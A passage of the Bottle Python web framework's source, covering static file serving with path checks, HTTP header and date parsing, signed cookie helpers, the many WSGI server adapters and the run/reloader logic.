IOError('File exists.')\n            with open(destination, 'wb') as fp:\n                self._copy_file(fp, chunk_size)\n        else:\n            self._copy_file(destination, chunk_size)\n\n###############################################################################\n# Application Helper ###########################################################\n###############################################################################\n\n\ndef abort(code=500, text='Unknown Error.'):\n    \"\"\" Aborts execution and causes a HTTP error. \"\"\"\n    raise HTTPError(code, text)\n\n\ndef redirect(url, code=None):\n    \"\"\" Aborts execution and causes a 303 or 302 redirect, depending on\n        the HTTP protocol version. \"\"\"\n    if not code:\n        code = 303 if request.get('SERVER_PROTOCOL') == \"HTTP/1.1\" else 302\n    res = response.copy(cls=HTTPResponse)\n    res.status = code\n    res.body = \"\"\n    res.set_header('Location', urljoin(request.url, url))\n    raise res\n\n\ndef _file_iter_range(fp, offset, bytes, maxread=1024 * 1024, close=False):\n    \"\"\" Yield chunks from a range in a file, optionally closing it at the end.\n        No chunk is bigger than maxread. \"\"\"\n    fp.seek(offset)\n    while bytes > 0:\n        part = fp.read(min(bytes, maxread))\n        if not part:\n            break\n        bytes -= len(part)\n        yield part\n    if close:\n        fp.close()\n\n\ndef static_file(filename, root,\n                mimetype=True,\n                download=False,\n                charset='UTF-8',\n                etag=None,\n                headers=None):\n    \"\"\" Open a file in a safe way and return an instance of :exc:`HTTPResponse`\n        that can be sent back to the client.\n\n        :param filename: Name or path of the file to send, relative to ``root``.\n        :param root: Root path for file lookups. Should be an absolute directory\n            path.\n        :param mimetype: Provide the content-type header (default: guess from\n            file extension)\n        :param download: If True, ask the browser to open a `Save as...` dialog\n            instead of opening the file with the associated program. You can\n            specify a custom filename as a string. If not specified, the\n            original filename is used (default: False).\n        :param charset: The charset for files with a ``text/*`` mime-type.\n            (default: UTF-8)\n        :param etag: Provide a pre-computed ETag header. If set to ``False``,\n            ETag handling is disabled. (default: auto-generate ETag header)\n        :param headers: Additional headers dict to add to the response.\n\n        While checking user input is always a good idea, this function provides\n        additional protection against malicious ``filename`` parameters from\n        breaking out of the ``root`` directory and leaking sensitive information\n        to an attacker.\n\n        Read-protected files or files outside of the ``root`` directory are\n        answered with ``403 Access Denied``. Missing files result in a\n        ``404 Not Found`` response. Conditional requests (``If-Modified-Since``,\n        ``If-None-Match``) are answered with ``304 Not Modified`` whenever\n        possible. ``HEAD`` and ``Range`` requests (used by download managers to\n        check or continue partial downloads) are also handled automatically.\n\n    \"\"\"\n\n    root = os.path.join(os.path.abspath(root), '')\n    filename = os.path.abspath(os.path.join(root, filename.strip('/\\\\')))\n    headers = headers.copy() if headers else {}\n\n    if not filename.startswith(root):\n        return HTTPError(403, \"Access denied.\")\n    if not os.path.exists(filename) or not os.path.isfile(filename):\n        return HTTPError(404, \"File does not exist.\")\n    if not os.access(filename, os.R_OK):\n        return HTTPError(403, \"You do not have permission to access this file.\")\n\n    if mimetype is True:\n        if download and download is not True:\n            mimetype, encoding = mimetypes.guess_type(download)\n        else:\n            mimetype, encoding = mimetypes.guess_type(filename)\n        if encoding:\n            headers['Content-Encoding'] = encoding\n\n    if mimetype:\n        if (mimetype[:5] == 'text/' or mimetype == 'application/javascript')\\\n          and charset and 'charset' not in mimetype:\n            mimetype += '; charset=%s' % charset\n        headers['Content-Type'] = mimetype\n\n    if download:\n        download = os.path.basename(filename if download is True else download)\n        headers['Content-Disposition'] = 'attachment; filename=\"%s\"' % download\n\n    stats = os.stat(filename)\n    headers['Content-Length'] = clen = stats.st_size\n    headers['Last-Modified'] = email.utils.formatdate(stats.st_mtime,\n                                                      usegmt=True)\n    headers['Date'] = email.utils.formatdate(time.time(), usegmt=True)\n\n    getenv = request.environ.get\n\n    if etag is None:\n        etag = '%d:%d:%d:%d:%s' % (stats.st_dev, stats.st_ino, stats.st_mtime,\n                                   clen, filename)\n        etag = hashlib.sha1(tob(etag)).hexdigest()\n\n    if etag:\n        headers['ETag'] = etag\n        check = getenv('HTTP_IF_NONE_MATCH')\n        if check and check == etag:\n            return HTTPResponse(status=304, **headers)\n\n    ims = getenv('HTTP_IF_MODIFIED_SINCE')\n    if ims:\n        ims = parse_date(ims.split(\";\")[0].strip())\n        if ims is not None and ims >= int(stats.st_mtime):\n            return HTTPResponse(status=304, **headers)\n\n    body = '' if request.method == 'HEAD' else open(filename, 'rb')\n\n    headers[\"Accept-Ranges\"] = \"bytes\"\n    range_header = getenv('HTTP_RANGE')\n    if range_header:\n        ranges = list(parse_range_header(range_header, clen))\n        if not ranges:\n            return HTTPError(416, \"Requested Range Not Satisfiable\")\n        offset, end = ranges[0]\n        headers[\"Content-Range\"] = \"bytes %d-%d/%d\" % (offset, end - 1, clen)\n        headers[\"Content-Length\"] = str(end - offset)\n        if body: body = _file_iter_range(body, offset, end - offset, close=True)\n        return HTTPResponse(body, status=206, **headers)\n    return HTTPResponse(body, **headers)\n\n###############################################################################\n# HTTP Utilities and MISC (TODO) ###############################################\n###############################################################################\n\n\ndef debug(mode=True):\n    \"\"\" Change the debug level.\n    There is only one debug level supported at the moment.\"\"\"\n    global DEBUG\n    if mode: warnings.simplefilter('default')\n    DEBUG = bool(mode)\n\n\ndef http_date(value):\n    if isinstance(value, basestring):\n        return value\n    if isinstance(value, datetime):\n        # aware datetime.datetime is converted to UTC time\n        # naive datetime.datetime is treated as UTC time\n        value = value.utctimetuple()\n    elif isinstance(value, datedate):\n        # datetime.date is naive, and is treated as UTC time\n        value = value.timetuple()\n    if not isinstance(value, (int, float)):\n        # convert struct_time in UTC to UNIX timestamp\n        value = calendar.timegm(value)\n    return email.utils.formatdate(value, usegmt=True)\n\n\ndef parse_date(ims):\n    \"\"\" Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. \"\"\"\n    try:\n        ts = email.utils.parsedate_tz(ims)\n        return calendar.timegm(ts[:8] + (0, )) - (ts[9] or 0)\n    except (TypeError, ValueError, IndexError, OverflowError):\n        return None\n\n\ndef parse_auth(header):\n    \"\"\" Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None\"\"\"\n    try:\n        method, data = header.split(None, 1)\n        if method.lower() == 'basic':\n            user, pwd = touni(base64.b64decode(tob(data))).split(':', 1)\n            return user, pwd\n    except (KeyError, ValueError):\n        return None\n\n\ndef parse_range_header(header, maxlen=0):\n    \"\"\" Yield (start, end) ranges parsed from a HTTP Range header. Skip\n        unsatisfiable ranges. The end index is non-inclusive.\"\"\"\n    if not header or header[:6] != 'bytes=': return\n    ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r]\n    for start, end in ranges:\n        try:\n            if not start:  # bytes=-100    -> last 100 bytes\n                start, end = max(0, maxlen - int(end)), maxlen\n            elif not end:  # bytes=100-    -> all but the first 99 bytes\n                start, end = int(start), maxlen\n            else:  # bytes=100-200 -> bytes 100-200 (inclusive)\n                start, end = int(start), min(int(end) + 1, maxlen)\n            if 0 <= start < end <= maxlen:\n                yield start, end\n        except ValueError:\n            pass\n\n\n#: Header tokenizer used by _parse_http_header()\n_hsplit = re.compile('(?:(?:\"((?:[^\"\\\\\\\\]|\\\\\\\\.)*)\")|([^;,=]+))([;,=]?)').findall\n\ndef _parse_http_header(h):\n    \"\"\" Parses a typical multi-valued and parametrised HTTP header (e.g. Accept headers) and returns a list of values\n        and parameters. For non-standard or broken input, this implementation may return partial results.\n    :param h: A header string (e.g. ``text/html,text/plain;q=0.9,*/*;q=0.8``)\n    :return: List of (value, params) tuples. The second element is a (possibly empty) dict.\n    \"\"\"\n    values = []\n    if '\"' not in h:  # INFO: Fast path without regexp (~2x faster)\n        for value in h.split(','):\n            parts = value.split(';')\n            values.append((parts[0].strip(), {}))\n            for attr in parts[1:]:\n                name, value = attr.split('=', 1)\n                values[-1][1][name.strip()] = value.strip()\n    else:\n        lop, key, attrs = ',', None, {}\n        for quoted, plain, tok in _hsplit(h):\n            value = plain.strip() if plain else quoted.replace('\\\\\"', '\"')\n            if lop == ',':\n                attrs = {}\n                values.append((value, attrs))\n            elif lop == ';':\n                if tok == '=':\n                    key = value\n                else:\n                    attrs[value] = ''\n            elif lop == '=' and key:\n                attrs[key] = value\n                key = None\n            lop = tok\n    return values\n\n\ndef _parse_qsl(qs):\n    r = []\n    for pair in qs.split('&'):\n        if not pair: continue\n        nv = pair.split('=', 1)\n        if len(nv) != 2: nv.append('')\n        key = urlunquote(nv[0].replace('+', ' '))\n        value = urlunquote(nv[1].replace('+', ' '))\n        r.append((key, value))\n    return r\n\n\ndef _lscmp(a, b):\n    \"\"\" Compares two strings in a cryptographically safe way:\n        Runtime is not affected by length of common prefix. \"\"\"\n    return not sum(0 if x == y else 1\n                   for x, y in zip(a, b)) and len(a) == len(b)\n\n\ndef cookie_encode(data, key, digestmod=None):\n    \"\"\" Encode and sign a pickle-able object. Return a (byte) string \"\"\"\n    depr(0, 13, \"cookie_encode() will be removed soon.\",\n                \"Do not use this API directly.\")\n    digestmod = digestmod or hashlib.sha256\n    msg = base64.b64encode(pickle.dumps(data, -1))\n    sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=digestmod).digest())\n    return tob('!') + sig + tob('?') + msg\n\n\ndef cookie_decode(data, key, digestmod=None):\n    \"\"\" Verify and decode an encoded string. Return an object or None.\"\"\"\n    depr(0, 13, \"cookie_decode() will be removed soon.\",\n                \"Do not use this API directly.\")\n    data = tob(data)\n    if cookie_is_encoded(data):\n        sig, msg = data.split(tob('?'), 1)\n        digestmod = digestmod or hashlib.sha256\n        hashed = hmac.new(tob(key), msg, digestmod=digestmod).digest()\n        if _lscmp(sig[1:], base64.b64encode(hashed)):\n            return pickle.loads(base64.b64decode(msg))\n    return None\n\n\ndef cookie_is_encoded(data):\n    \"\"\" Return True if the argument looks like a encoded cookie.\"\"\"\n    depr(0, 13, \"cookie_is_encoded() will be removed soon.\",\n                \"Do not use this API directly.\")\n    return bool(data.startswith(tob('!')) and tob('?') in data)\n\n\ndef html_escape(string):\n    \"\"\" Escape HTML special characters ``&<>`` and quotes ``'\"``. \"\"\"\n    return string.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')\\\n                 .replace('\"', '&quot;').replace(\"'\", '&#039;')\n\n\ndef html_quote(string):\n    \"\"\" Escape and quote a string to be used as an HTTP attribute.\"\"\"\n    return '\"%s\"' % html_escape(string).replace('\\n', '&#10;')\\\n                    .replace('\\r', '&#13;').replace('\\t', '&#9;')\n\n\ndef yieldroutes(func):\n    \"\"\" Return a generator for routes that match the signature (name, args)\n    of the func parameter. This may yield more than one route if the function\n    takes optional keyword arguments. The output is best described by example::\n\n        a()         -> '/a'\n        b(x, y)     -> '/b/<x>/<y>'\n        c(x, y=5)   -> '/c/<x>' and '/c/<x>/<y>'\n        d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>'\n    \"\"\"\n    path = '/' + func.__name__.replace('__', '/').lstrip('/')\n    spec = getargspec(func)\n    argc = len(spec[0]) - len(spec[3] or [])\n    path += ('/<%s>' * argc) % tuple(spec[0][:argc])\n    yield path\n    for arg in spec[0][argc:]:\n        path += '/<%s>' % arg\n        yield path\n\n\ndef path_shift(script_name, path_info, shift=1):\n    \"\"\" Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa.\n\n        :return: The modified paths.\n        :param script_name: The SCRIPT_NAME path.\n        :param script_name: The PATH_INFO path.\n        :param shift: The number of path fragments to shift. May be negative to\n          change the shift direction. (default: 1)\n    \"\"\"\n    if shift == 0: return script_name, path_info\n    pathlist = path_info.strip('/').split('/')\n    scriptlist = script_name.strip('/').split('/')\n    if pathlist and pathlist[0] == '': pathlist = []\n    if scriptlist and scriptlist[0] == '': scriptlist = []\n    if 0 < shift <= len(pathlist):\n        moved = pathlist[:shift]\n        scriptlist = scriptlist + moved\n        pathlist = pathlist[shift:]\n    elif 0 > shift >= -len(scriptlist):\n        moved = scriptlist[shift:]\n        pathlist = moved + pathlist\n        scriptlist = scriptlist[:shift]\n    else:\n        empty = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO'\n        raise AssertionError(\"Cannot shift. Nothing left from %s\" % empty)\n    new_script_name = '/' + '/'.join(scriptlist)\n    new_path_info = '/' + '/'.join(pathlist)\n    if path_info.endswith('/') and pathlist: new_path_info += '/'\n    return new_script_name, new_path_info\n\n\ndef auth_basic(check, realm=\"private\", text=\"Access denied\"):\n    \"\"\" Callback decorator to require HTTP auth (basic).\n        TODO: Add route(check_auth=...) parameter. \"\"\"\n\n    def decorator(func):\n\n        @functools.wraps(func)\n        def wrapper(*a, **ka):\n            user, password = request.auth or (None, None)\n            if user is None or not check(user, password):\n                err = HTTPError(401, text)\n                err.add_header('WWW-Authenticate', 'Basic realm=\"%s\"' % realm)\n                return err\n            return func(*a, **ka)\n\n        return wrapper\n\n    return decorator\n\n# Shortcuts for common Bottle methods.\n# They all refer to the current default application.\n\n\ndef make_default_app_wrapper(name):\n    \"\"\" Return a callable that relays calls to the current default app. \"\"\"\n\n    @functools.wraps(getattr(Bottle, name))\n    def wrapper(*a, **ka):\n        return getattr(app(), name)(*a, **ka)\n\n    return wrapper\n\n\nroute     = make_default_app_wrapper('route')\nget       = make_default_app_wrapper('get')\npost      = make_default_app_wrapper('post')\nput       = make_default_app_wrapper('put')\ndelete    = make_default_app_wrapper('delete')\npatch     = make_default_app_wrapper('patch')\nerror     = make_default_app_wrapper('error')\nmount     = make_default_app_wrapper('mount')\nhook      = make_default_app_wrapper('hook')\ninstall   = make_default_app_wrapper('install')\nuninstall = make_default_app_wrapper('uninstall')\nurl       = make_default_app_wrapper('get_url')\n\n###############################################################################\n# Server Adapter ###############################################################\n###############################################################################\n\n# Before you edit or add a server adapter, please read:\n# - https://github.com/bottlepy/bottle/pull/647#issuecomment-60152870\n# - https://github.com/bottlepy/bottle/pull/865#issuecomment-242795341\n\nclass ServerAdapter(object):\n    quiet = False\n\n    def __init__(self, host='127.0.0.1', port=8080, **options):\n        self.options = options\n        self.host = host\n        self.port = int(port)\n\n    def run(self, handler):  # pragma: no cover\n        pass\n\n    def __repr__(self):\n        args = ', '.join('%s=%s' % (k, repr(v))\n                          for k, v in self.options.items())\n        return \"%s(%s)\" % (self.__class__.__name__, args)\n\n\nclass CGIServer(ServerAdapter):\n    quiet = True\n\n    def run(self, handler):  # pragma: no cover\n        from wsgiref.handlers import CGIHandler\n\n        def fixed_environ(environ, start_response):\n            environ.setdefault('PATH_INFO', '')\n            return handler(environ, start_response)\n\n        CGIHandler().run(fixed_environ)\n\n\nclass FlupFCGIServer(ServerAdapter):\n    def run(self, handler):  # pragma: no cover\n        import flup.server.fcgi\n        self.options.setdefault('bindAddress', (self.host, self.port))\n        flup.server.fcgi.WSGIServer(handler, **self.options).run()\n\n\nclass WSGIRefServer(ServerAdapter):\n    def run(self, app):  # pragma: no cover\n        from wsgiref.simple_server import make_server\n        from wsgiref.simple_server import WSGIRequestHandler, WSGIServer\n        import socket\n\n        class FixedHandler(WSGIRequestHandler):\n            def address_string(self):  # Prevent reverse DNS lookups please.\n                return self.client_address[0]\n\n            def log_request(*args, **kw):\n                if not self.quiet:\n                    return WSGIRequestHandler.log_request(*args, **kw)\n\n        handler_cls = self.options.get('handler_class', FixedHandler)\n        server_cls = self.options.get('server_class', WSGIServer)\n\n        if ':' in self.host:  # Fix wsgiref for IPv6 addresses.\n            if getattr(server_cls, 'address_family') == socket.AF_INET:\n\n                class server_cls(server_cls):\n                    address_family = socket.AF_INET6\n\n        self.srv = make_server(self.host, self.port, app, server_cls,\n                               handler_cls)\n        self.port = self.srv.server_port  # update port actual port (0 means random)\n        try:\n            self.srv.serve_forever()\n        except KeyboardInterrupt:\n            self.srv.server_close()  # Prevent ResourceWarning: unclosed socket\n            raise\n\n\nclass CherryPyServer(ServerAdapter):\n    def run(self, handler):  # pragma: no cover\n        depr(0, 13, \"The wsgi server part of cherrypy was split into a new \"\n                    \"project called 'cheroot'.\", \"Use the 'cheroot' server \"\n                    \"adapter instead of cherrypy.\")\n        from cherrypy import wsgiserver # This will fail for CherryPy >= 9\n\n        self.options['bind_addr'] = (self.host, self.port)\n        self.options['wsgi_app'] = handler\n\n        certfile = self.options.get('certfile')\n        if certfile:\n            del self.options['certfile']\n        keyfile = self.options.get('keyfile')\n        if keyfile:\n            del self.options['keyfile']\n\n        server = wsgiserver.CherryPyWSGIServer(**self.options)\n        if certfile:\n            server.ssl_certificate = certfile\n        if keyfile:\n            server.ssl_private_key = keyfile\n\n        try:\n            server.start()\n        finally:\n            server.stop()\n\n\nclass CherootServer(ServerAdapter):\n    def run(self, handler): # pragma: no cover\n        from cheroot import wsgi\n        from cheroot.ssl import builtin\n        self.options['bind_addr'] = (self.host, self.port)\n        self.options['wsgi_app'] = handler\n        certfile = self.options.pop('certfile', None)\n        keyfile = self.options.pop('keyfile', None)\n        chainfile = self.options.pop('chainfile', None)\n        server = wsgi.Server(**self.options)\n        if certfile and keyfile:\n            server.ssl_adapter = builtin.BuiltinSSLAdapter(\n                    certfile, keyfile, chainfile)\n        try:\n            server.start()\n        finally:\n            server.stop()\n\n\nclass WaitressServer(ServerAdapter):\n    def run(self, handler):\n        from waitress import serve\n        serve(handler, host=self.host, port=self.port, _quiet=self.quiet, **self.options)\n\n\nclass PasteServer(ServerAdapter):\n    def run(self, handler):  # pragma: no cover\n        from paste import httpserver\n        from paste.translogger import TransLogger\n        handler = TransLogger(handler, setup_console_handler=(not self.quiet))\n        httpserver.serve(handler,\n                         host=self.host,\n                         port=str(self.port), **self.options)\n\n\nclass MeinheldServer(ServerAdapter):\n    def run(self, handler):\n        from meinheld import server\n        server.listen((self.host, self.port))\n        server.run(handler)\n\n\nclass FapwsServer(ServerAdapter):\n    \"\"\" Extremely fast webserver using libev. See http://www.fapws.org/ \"\"\"\n\n    def run(self, handler):  # pragma: no cover\n        depr(0, 13, \"fapws3 is not maintained and support will be dropped.\")\n        import fapws._evwsgi as evwsgi\n        from fapws import base, config\n        port = self.port\n        if float(config.SERVER_IDENT[-2:]) > 0.4:\n            # fapws3 silently changed its API in 0.5\n            port = str(port)\n        evwsgi.start(self.host, port)\n        # fapws3 never releases the GIL. Complain upstream. I tried. No luck.\n        if 'BOTTLE_CHILD' in os.environ and not self.quiet:\n            _stderr(\"WARNING: Auto-reloading does not work with Fapws3.\")\n            _stderr(\"         (Fapws3 breaks python thread support)\")\n        evwsgi.set_base_module(base)\n\n        def app(environ, start_response):\n            environ['wsgi.multiprocess'] = False\n            return handler(environ, start_response)\n\n        evwsgi.wsgi_cb(('', app))\n        evwsgi.run()\n\n\nclass TornadoServer(ServerAdapter):\n    \"\"\" The super hyped asynchronous server by facebook. Untested. \"\"\"\n\n    def run(self, handler):  # pragma: no cover\n        import tornado.wsgi, tornado.httpserver, tornado.ioloop\n        container = tornado.wsgi.WSGIContainer(handler)\n        server = tornado.httpserver.HTTPServer(container)\n        server.listen(port=self.port, address=self.host)\n        tornado.ioloop.IOLoop.instance().start()\n\n\nclass AppEngineServer(ServerAdapter):\n    \"\"\" Adapter for Google App Engine. \"\"\"\n    quiet = True\n\n    def run(self, handler):\n        depr(0, 13, \"AppEngineServer no longer required\",\n             \"Configure your application directly in your app.yaml\")\n        from google.appengine.ext.webapp import util\n        # A main() function in the handler script enables 'App Caching'.\n        # Lets makes sure it is there. This _really_ improves performance.\n        module = sys.modules.get('__main__')\n        if module and not hasattr(module, 'main'):\n            module.main = lambda: util.run_wsgi_app(handler)\n        util.run_wsgi_app(handler)\n\n\nclass TwistedServer(ServerAdapter):\n    \"\"\" Untested. \"\"\"\n\n    def run(self, handler):\n        from twisted.web import server, wsgi\n        from twisted.python.threadpool import ThreadPool\n        from twisted.internet import reactor\n        thread_pool = ThreadPool()\n        thread_pool.start()\n        reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop)\n        factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler))\n        reactor.listenTCP(self.port, factory, interface=self.host)\n        if not reactor.running:\n            reactor.run()\n\n\nclass DieselServer(ServerAdapter):\n    \"\"\" Untested. \"\"\"\n\n    def run(self, handler):\n        depr(0, 13, \"Diesel is not tested or supported and will be removed.\")\n        from diesel.protocols.wsgi import WSGIApplication\n        app = WSGIApplication(handler, port=self.port)\n        app.run()\n\n\nclass GeventServer(ServerAdapter):\n    \"\"\" Untested. Options:\n\n        * See gevent.wsgi.WSGIServer() documentation for more options.\n    \"\"\"\n\n    def run(self, handler):\n        from gevent import pywsgi, local\n        if not isinstance(threading.local(), local.local):\n            msg = \"Bottle requires gevent.monkey.patch_all() (before import)\"\n            raise RuntimeError(msg)\n        if self.quiet:\n            self.options['log'] = None\n        address = (self.host, self.port)\n        server = pywsgi.WSGIServer(address, handler, **self.options)\n        if 'BOTTLE_CHILD' in os.environ:\n            import signal\n            signal.signal(signal.SIGINT, lambda s, f: server.stop())\n        server.serve_forever()\n\n\nclass GunicornServer(ServerAdapter):\n    \"\"\" Untested. See http://gunicorn.org/configure.html for options. \"\"\"\n\n    def run(self, handler):\n        from gunicorn.app.base import BaseApplication\n\n        if self.host.startswith(\"unix:\"):\n            config = {'bind': self.host}\n        else:\n            config = {'bind': \"%s:%d\" % (self.host, self.port)}\n\n        config.update(self.options)\n\n        class GunicornApplication(BaseApplication):\n            def load_config(self):\n                for key, value in config.items():\n                    self.cfg.set(key, value)\n\n            def load(self):\n                return handler\n\n        GunicornApplication().run()\n\n\nclass EventletServer(ServerAdapter):\n    \"\"\" Untested. Options:\n\n        * `backlog` adjust the eventlet backlog parameter which is the maximum\n          number of queued connections. Should be at least 1; the maximum\n          value is system-dependent.\n        * `family`: (default is 2) socket family, optional. See socket\n          documentation for available families.\n    \"\"\"\n\n    def run(self, handler):\n        from eventlet import wsgi, listen, patcher\n        if not patcher.is_monkey_patched(os):\n            msg = \"Bottle requires eventlet.monkey_patch() (before import)\"\n            raise RuntimeError(msg)\n        socket_args = {}\n        for arg in ('backlog', 'family'):\n            try:\n                socket_args[arg] = self.options.pop(arg)\n            except KeyError:\n                pass\n        address = (self.host, self.port)\n        try:\n            wsgi.server(listen(address, **socket_args), handler,\n                        log_output=(not self.quiet))\n        except TypeError:\n            # Fallback, if we have old version of eventlet\n            wsgi.server(listen(address), handler)\n\n\nclass BjoernServer(ServerAdapter):\n    \"\"\" Fast server written in C: https://github.com/jonashaag/bjoern \"\"\"\n\n    def run(self, handler):\n        from bjoern import run\n        run(handler, self.host, self.port, reuse_port=True)\n\nclass AsyncioServerAdapter(ServerAdapter):\n    \"\"\" Extend ServerAdapter for adding custom event loop \"\"\"\n    def get_event_loop(self):\n        pass\n\nclass AiohttpServer(AsyncioServerAdapter):\n    \"\"\" Asynchronous HTTP client/server framework for asyncio\n        https://pypi.python.org/pypi/aiohttp/\n        https://pypi.org/project/aiohttp-wsgi/\n    \"\"\"\n\n    def get_event_loop(self):\n        import asyncio\n        return asyncio.new_event_loop()\n\n    def run(self, handler):\n        import asyncio\n        from aiohttp_wsgi.wsgi import serve\n        self.loop = self.get_event_loop()\n        asyncio.set_event_loop(self.loop)\n\n        if 'BOTTLE_CHILD' in os.environ:\n            import signal\n            signal.signal(signal.SIGINT, lambda s, f: self.loop.stop())\n\n        serve(handler, host=self.host, port=self.port)\n\n\nclass AiohttpUVLoopServer(AiohttpServer):\n    \"\"\"uvloop\n       https://github.com/MagicStack/uvloop\n    \"\"\"\n    def get_event_loop(self):\n        import uvloop\n        return uvloop.new_event_loop()\n\nclass AutoServer(ServerAdapter):\n    \"\"\" Untested. \"\"\"\n    adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer,\n                CherootServer, WSGIRefServer]\n\n    def run(self, handler):\n        for sa in self.adapters:\n            try:\n                return sa(self.host, self.port, **self.options).run(handler)\n            except ImportError:\n                pass\n\n\nserver_names = {\n    'cgi': CGIServer,\n    'flup': FlupFCGIServer,\n    'wsgiref': WSGIRefServer,\n    'waitress': WaitressServer,\n    'cherrypy': CherryPyServer,\n    'cheroot': CherootServer,\n    'paste': PasteServer,\n    'fapws3': FapwsServer,\n    'tornado': TornadoServer,\n    'gae': AppEngineServer,\n    'twisted': TwistedServer,\n    'diesel': DieselServer,\n    'meinheld': MeinheldServer,\n    'gunicorn': GunicornServer,\n    'eventlet': EventletServer,\n    'gevent': GeventServer,\n    'bjoern': BjoernServer,\n    'aiohttp': AiohttpServer,\n    'uvloop': AiohttpUVLoopServer,\n    'auto': AutoServer,\n}\n\n###############################################################################\n# Application Control ##########################################################\n###############################################################################\n\n\ndef load(target, **namespace):\n    \"\"\" Import a module or fetch an object from a module.\n\n        * ``package.module`` returns `module` as a module object.\n        * ``pack.mod:name`` returns the module variable `name` from `pack.mod`.\n        * ``pack.mod:func()`` calls `pack.mod.func()` and returns the result.\n\n        The last form accepts not only function calls, but any type of\n        expression. Keyword arguments passed to this function are available as\n        local variables. Example: ``import_string('re:compile(x)', x='[a-z]')``\n    \"\"\"\n    module, target = target.split(\":\", 1) if ':' in target else (target, None)\n    if module not in sys.modules: __import__(module)\n    if not target: return sys.modules[module]\n    if target.isalnum(): return getattr(sys.modules[module], target)\n    package_name = module.split('.')[0]\n    namespace[package_name] = sys.modules[package_name]\n    return eval('%s.%s' % (module, target), namespace)\n\n\ndef load_app(target):\n    \"\"\" Load a bottle application from a module and make sure that the import\n        does not affect the current default application, but returns a separate\n        application object. See :func:`load` for the target parameter. \"\"\"\n    global NORUN\n    NORUN, nr_old = True, NORUN\n    tmp = default_app.push()  # Create a new \"default application\"\n    try:\n        rv = load(target)  # Import the target module\n        return rv if callable(rv) else tmp\n    finally:\n        default_app.remove(tmp)  # Remove the temporary added default application\n        NORUN = nr_old\n\n\n_debug = debug\n\n\ndef run(app=None,\n        server='wsgiref',\n        host='127.0.0.1',\n        port=8080,\n        interval=1,\n        reloader=False,\n        quiet=False,\n        plugins=None,\n        debug=None,\n        config=None, **kargs):\n    \"\"\" Start a server instance. This method blocks until the server terminates.\n\n        :param app: WSGI application or target string supported by\n               :func:`load_app`. (default: :func:`default_app`)\n        :param server: Server adapter to use. See :data:`server_names` keys\n               for valid names or pass a :class:`ServerAdapter` subclass.\n               (default: `wsgiref`)\n        :param host: Server address to bind to. Pass ``0.0.0.0`` to listens on\n               all interfaces including the external one. (default: 127.0.0.1)\n        :param port: Server port to bind to. Values below 1024 require root\n               privileges. (default: 8080)\n        :param reloader: Start auto-reloading server? (default: False)\n        :param interval: Auto-reloader interval in seconds (default: 1)\n        :param quiet: Suppress output to stdout and stderr? (default: False)\n        :param options: Options passed to the server adapter.\n     \"\"\"\n    if NORUN: return\n    if reloader and not os.environ.get('BOTTLE_CHILD'):\n        import subprocess\n        fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock')\n        environ = os.environ.copy()\n        environ['BOTTLE_CHILD'] = 'true'\n        environ['BOTTLE_LOCKFILE'] = lockfile\n        args = [sys.executable] + sys.argv\n        # If a package was loaded with `python -m`, then `sys.argv` needs to be\n        # restored to the original value, or imports might break. See #1336\n        if getattr(sys.modules.get('__main__'), '__package__', None):\n            args[1:1] = [\"-m\", sys.modules['__main__'].__package__]\n\n        try:\n            os.close(fd)  # We never write to this file\n            while os.path.exists(lockfile):\n                p = subprocess.Popen(args, env=environ)\n                while p.poll() is None:\n                    os.utime(lockfile, None)  # Tell child we are still alive\n                    time.sleep(interval)\n                if p.returncode == 3:  # Child wants to be restarted\n                    continue\n                sys.exit(p.returncode)\n        except KeyboardInterrupt:\n            pass\n        finally:\n            if os.path.exists(lockfile):\n                os.unlink(lockfile)\n        return\n\n    try:\n        if debug is not None: _debug(debug)\n        app = app or default_app()\n        if isinstance(app, basestring):\n            app = load_app(app)\n        if not callable(app):\n            raise ValueError(\"Application is not callable: %r\" % app)\n\n        for plugin in plugins or []:\n            if isinstance(plugin, basestring):\n                plugin = load(plugin)\n            app.install(plugin)\n\n        if config:\n            app.config.update(config)\n\n        if server in server_names:\n            server = server_names.get(server)\n        if isinstance(server, basestring):\n            server = load(server)\n        if isinstance(server, type):\n            server = server(host=host, port=port, **kargs)\n        if not isinstance(server, ServerAdapter):\n            raise ValueError(\"Unknown or unsupported server: %r\" % server)\n\n        server.quiet = server.quiet or quiet\n        if not server.quiet:\n            _stderr(\"Bottle v%s server starting up (using %s)...\" %\n                    (__version__, repr(server)))\n            if server.host.startswith(\"unix:\"):\n                _stderr(\"Listening on %s\" % server.host)\n            else:\n                _stderr(\"Listening on http://%s:%d/\" %\n                        (server.host, server.port))\n            _stderr(\"Hit Ctrl-C to quit.\\n\")\n\n        if reloader:\n            lockfile = os.environ.get('BOTTLE_LOCKFILE')\n            bgcheck = FileCheckerThread(lockfile, interval)\n            with bgcheck:\n                server.run(app)\n            if bgcheck.status == 'reload':\n                sys.exit(3)\n        else:\n            server.run(app)\n    except KeyboardInterrupt:\n        pass\n    except (SystemExit, MemoryError):\n        raise\n    except:\n        if not reloader: raise\n        if not getattr(server, 'quiet', quiet):\n            print_exc()\n        time.sleep(interval)\n        sys.exit(3)\n\n\nclass FileCheckerThread(threading.Thread):\n    \"\"\" Interrupt main-thread as soon as a changed module file is detected,\n        the lockfile gets deleted or gets too old. \"\"\"\n\n    def __init__(self, lockfile, interval):\n        threading.Thread.__init__(self)\n        self.daemon = True\n        self.lockfile, self.interval = lockfile, interval\n        #: Is one of 'reload', 'error' or 'exit'\n        self.status = None\n\n    def run(self):\n        exists = os.path.exists\n        mtime = lambda p: os.stat(p).st_mtime\n        files = dict()\n\n        for module in list(sys.modules.values()):\n            path = getattr(module, '__file__', '') or ''\n            if path[-4:] in ('.pyo', '.pyc'): path = path[:-1]\n            if path and exists(path): files[path] = mtime(path)\n\n        while not self.status:\n            if not exists(self.lockfile)\\\n            or mtime(self.lockfile) < time.time() - self.interval - 5:\n                self.status = 'error'\n                thread.interrupt_main()\n            for path, lmtime in list(files.items()):\n                if not exists(path) or mtime(path) > lmtime:\n                    